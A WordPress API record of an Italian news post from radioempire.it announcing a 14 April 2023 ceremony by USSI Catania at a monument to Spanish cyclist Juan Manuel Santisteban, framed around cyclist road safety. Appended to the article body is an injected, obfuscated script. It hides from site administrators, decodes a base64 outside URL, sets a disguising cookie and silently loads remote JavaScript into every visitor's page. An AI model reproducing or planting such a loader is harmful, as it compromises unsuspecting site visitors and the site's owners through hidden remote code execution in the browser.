{"id":39721,"date":"2023-04-11T07:52:54","date_gmt":"2023-04-11T07:52:54","guid":{"rendered":"https:\/\/www.radioempire.it\/?p=39721"},"modified":"2026-02-24T23:04:14","modified_gmt":"2026-02-24T23:04:14","slug":"grandi-sfide-sulle-strade-dellisola-lussi-catania-ricorda-il-ciclista-spagnolo-juan-manuel-santisteban","status":"publish","type":"post","link":"https:\/\/www.radioempire.it\/index.php\/2023\/04\/11\/grandi-sfide-sulle-strade-dellisola-lussi-catania-ricorda-il-ciclista-spagnolo-juan-manuel-santisteban\/","title":{"rendered":"GRANDI\u00a0SFIDE\u00a0SULLE STRADE DELL&#8217;ISOLA  L\u2019USSI CATANIA RICORDA IL CICLISTA SPAGNOLO  JUAN MANUEL SANTISTEBAN"},"content":{"rendered":"<p><strong><em>La corsa a tappe del Giro di Sicilia, ha preso il via da Marsala. Quattro le frazioni in programma con gran finale venerd\u00ec 14 aprile a Giarre. <\/em><\/strong><\/p>\n<p><em>In occasione proprio della 4\u00b0 tappa, con partenza da Barcellona Pozzo di Gotto, con arrivo a Giarre, l\u2019USSI Catania, mette il sigillo, alla prima, di una serie di iniziative, dall\u2019insediamento del nuovo direttivo: <\/em><\/p>\n<p><em><strong>Venerd\u00ec 14 aprile 2023<\/strong><\/em><em>, alle <strong>ore 11<\/strong>, in via Nuova ad Aci Sant&#8217;Antonio, l&#8217;<strong>Ussi Catania<\/strong>, far\u00e0 \u201ctappa\u201d, nel nuovo Monumento dedicato alla memoria di <strong>Juan Manuel Santisteban<\/strong>, ciclista spagnolo, scomparso il 21 maggio del 1976, nella prima semitappa del Giro d&#8217;Italia che part\u00ec\u00a0da\u00a0Catania.\u00a0\u00a0 <\/em><\/p>\n<p><strong>Straordinario l\u2019intervento dell&#8217;Amministrazione comunale di Aci Sant\u2019Antonio, del sindaco <\/strong><strong>Santo Caruso<\/strong><strong> e del Consigliere comunale <\/strong><strong>Salvo Conti<\/strong><strong>, ciclista amatoriale, che hanno provveduto alla riqualificazione del monumento, terminata il\u00a03\u00a0agosto\u00a0scorso, con la creazione di una \u201c<em>piazzola del ciclista<\/em>\u201d, una \u201c<em>panca\u201d<\/em>, una \u201c<em>fontana<\/em>\u201d, lo \u201c<em>slot\u201d<\/em> per le biciclette, insomma, dovr\u00e0 essere occasione per riflettere sulla sicurezza stradale, sulla sicurezza dei ciclisti, oggi pi\u00f9 che mai attuale, con la morte\u00a0di\u00a0Rebellin.<\/strong><\/p>\n<p><strong>Il percorso, per raggiungere questo obiettivo, non \u00e8 stato facile. Iniziativa fortemente voluta dal vicepresidente dell\u2019USSI, <\/strong><strong>Nunzio Currenti<\/strong><strong>, anche perch\u00e9 la sensibilit\u00e0 dell&#8217;Ussi \u00e8 stata sempre alta sul tema. <\/strong><\/p>\n<p><strong>Interverranno oltre al sindaco, <\/strong><strong>Santo Caruso <\/strong><strong>e il consigliere <\/strong><strong>Salvo Conti<\/strong><strong>, il presidente regionale USSI <\/strong><strong>Gaetano\u00a0Rizzo<\/strong><strong>,\u00a0il presidente provinciale <\/strong><strong>Daniele Lo\u00a0Porto<\/strong><strong> e il presidente Federciclismo catanese, <\/strong><strong>Adolfo\u00a0Scandurra.<\/strong><\/p>\n<p><strong>Lucio Di Mauro <\/strong><\/p>\n<p>&nbsp;<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La corsa a tappe del Giro di Sicilia, ha preso il via da Marsala. Quattro le frazioni in programma con gran finale venerd\u00ec 14 aprile a Giarre. In occasione proprio<\/p>\n<div><a class=\"permalink\" href=\"https:\/\/www.radioempire.it\/index.php\/2023\/04\/11\/grandi-sfide-sulle-strade-dellisola-lussi-catania-ricorda-il-ciclista-spagnolo-juan-manuel-santisteban\/\">Read More&#8230;<\/a><\/div>\n","protected":false},"author":2,"featured_media":39723,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[3,36],"tags":[],"_links":{"self":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts\/39721"}],"collection":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/comments?post=39721"}],"version-history":[{"count":2,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts\/39721\/revisions"}],"predecessor-version":[{"id":57401,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts\/39721\/revisions\/57401"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/media\/39723"}],"wp:attachment":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/media?parent=39721"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/categories?post=39721"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/tags?post=39721"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}